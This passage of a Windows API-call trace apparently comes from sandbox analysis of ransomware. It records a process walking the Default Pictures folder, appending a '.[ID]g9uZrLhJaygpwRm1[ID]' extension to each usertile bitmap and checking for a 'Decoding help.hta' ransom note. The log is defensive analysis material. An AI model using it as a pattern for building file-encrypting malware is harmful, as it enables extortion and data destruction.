Pictures\\*.*") returned 75 [0058.114] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile21.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" [0058.114] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" [0058.114] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.114] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd09009d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0058.115] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.115] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.115] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.115] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile22.bmp") returned -1 [0058.115] lstrlenW (lpString="usertile22.bmp") returned 14 [0058.115] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.115] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.115] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile22.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" [0058.115] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" [0058.115] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.115] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3cc216, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3cc216, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd0b61fb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0058.115] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.115] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.115] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.115] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile23.bmp") returned -1 [0058.116] lstrlenW (lpString="usertile23.bmp") returned 14 [0058.116] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.116] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.116] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile23.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" [0058.116] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" [0058.116] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.116] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd232fa7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0058.116] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.116] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.116] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.116] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile24.bmp") returned -1 [0058.116] lstrlenW (lpString="usertile24.bmp") returned 14 [0058.116] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.116] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile24.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" [0058.117] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" [0058.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.117] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd259105, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0058.117] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.117] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.117] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile25.bmp") returned -1 [0058.117] lstrlenW (lpString="usertile25.bmp") returned 14 [0058.117] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.117] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile25.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" [0058.117] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" [0058.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.117] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd27f263, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0058.118] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.118] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.118] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.118] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile26.bmp") returned -1 [0058.118] lstrlenW (lpString="usertile26.bmp") returned 14 [0058.118] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.118] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.118] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile26.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" [0058.118] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" [0058.118] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.118] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4184d0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4184d0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd2a53c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0058.118] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.118] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.118] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.118] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile27.bmp") returned -1 [0058.119] lstrlenW (lpString="usertile27.bmp") returned 14 [0058.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.119] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile27.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" [0058.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" [0058.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.119] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3177db, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0058.119] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.119] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.119] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.119] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile28.bmp") returned -1 [0058.119] lstrlenW (lpString="usertile28.bmp") returned 14 [0058.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All 